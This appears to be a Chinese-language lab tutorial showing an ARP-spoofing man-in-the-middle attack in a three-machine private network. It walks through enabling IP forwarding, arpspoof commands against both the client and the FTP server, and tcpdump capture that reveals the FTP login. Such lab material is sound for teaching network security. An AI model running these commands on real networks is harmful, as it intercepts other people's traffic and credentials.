配置环境:
kali(中间人):192.168.3.90
win7pro(PC机):192.168.3.91
win10(ftp服务):192.168.3.83
*三台主机相互PING通
实验原理:PC机访问本网络的一台FPTserver服务的主机,中间人kali进行arp投毒,获取PC机和FTPserver主机之间的回话记录,截获用户名和密码。
图片.png
step1:中间人kali开启路由转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
step2:进行ARP投毒
1:PC机要向FTPserver发送报文,kali欺骗PC机说自己是FTPserver;
指令:arpspoof -i eth0 -t 192.168.3.91 192.168.3.83
图片.png
2: 接下来开始欺骗FTP,同理,kali(中间人)进行欺骗,欺骗FTP说自己是PC机
指令:arpspoof -i eth0 -t 192.168.3.83 192.168.3.91
图片.png
step3:
kali(中间人) 进行抓包模式
指令:tcpdump -i eth0 -nn -X tcp port 21
图片.png
step4:
之前我们在win10上用(3CDaemon)搭建的FTP的用户名为admin 密码为123456
step5:
我们在win7pro上进行ftp命令,连接到win10(FTPserver)上,并输入之前搭建的FTP账户和密码
图片.png
step6:
查看刚刚我们用kali的抓包,可以准确的截获用户名和密码
图片.png
